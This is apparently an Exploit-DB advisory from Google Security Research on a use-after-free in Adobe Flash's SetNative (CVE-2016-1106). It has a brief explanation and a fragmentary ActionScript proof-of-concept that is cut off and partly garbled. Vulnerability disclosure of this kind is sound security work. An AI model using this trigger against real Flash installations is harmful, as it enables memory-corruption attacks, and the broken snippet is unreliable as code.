Adobe Flash - SetNative Use-After-Free

ID EDB-ID:39831
Type exploitdb
Reporter Google Security Research
Modified 2016-05-17T00:00:00


Adobe Flash - SetNative Use-After-Free. CVE-2016-1106. Dos exploits for multiple platform


There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:

var t = this.createEmptyMovieClip("t", 1);"a", func);
ASSetNative(t, 106, "a,b");
function func (){

A swf and fla are attached.

Proof of Concept: